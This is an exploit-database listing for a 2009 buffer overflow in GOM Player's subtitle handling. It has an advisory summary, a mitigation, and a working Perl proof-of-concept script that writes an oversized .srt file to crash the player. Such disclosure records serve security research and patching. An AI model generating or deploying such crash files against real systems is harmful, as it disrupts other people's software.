header-logo
Suggest Exploit
vendor:
GOM Player
by:
Bui Quang Minh
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: GOM Player
Affected Version From: 2.1.16.6134
Affected Version To: 2.1.16.6134
Patch Exists: YES
Related CWE: N/A
CPE: a:gomlab:gom_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP, Windows Vista, Windows 7
2009

GOM Player Subtitle Buffer Overflow Vulnerabiltity

A buffer overflow vulnerability exists in GOM Player 2.1.16.6134. A specially crafted .srt file with a length of 10240 x 4 bytes can cause a denial of service condition when opened with GOM Player. This vulnerability affects Windows XP, Windows Vista, and Windows 7.

Mitigation:

Upgrade to the latest version of GOM Player.
Source

Exploit-DB raw data:

#!/usr/local/bin/perl

##################################################################
#
#	Title : GOM Player Subtitle Buffer Overflow Vulnerabiltity
#	Discovery by : Bui Quang Minh
#	Tested : GOM Player 2.1.16.6134
#	Reference : Bkis [http://security.bkis.vn/?p=501]
#	PoC : Windows XP (Silently Crash) and Windows Vista, Windows 7.
#	
##################################################################

my $buffer = "A" x 10240 x 4;
my $filename = "gomdos.srt";
open (FILE,">$filename") || die "\nCan't open $file: $!";
print FILE "$buffer";
close (FILE);
print "\nSuccessfully!\n\nPlease try $filename with a video file!\n";

# milw0rm.com [2009-04-08]

Navigation

Suggest Exploit

Services By CQR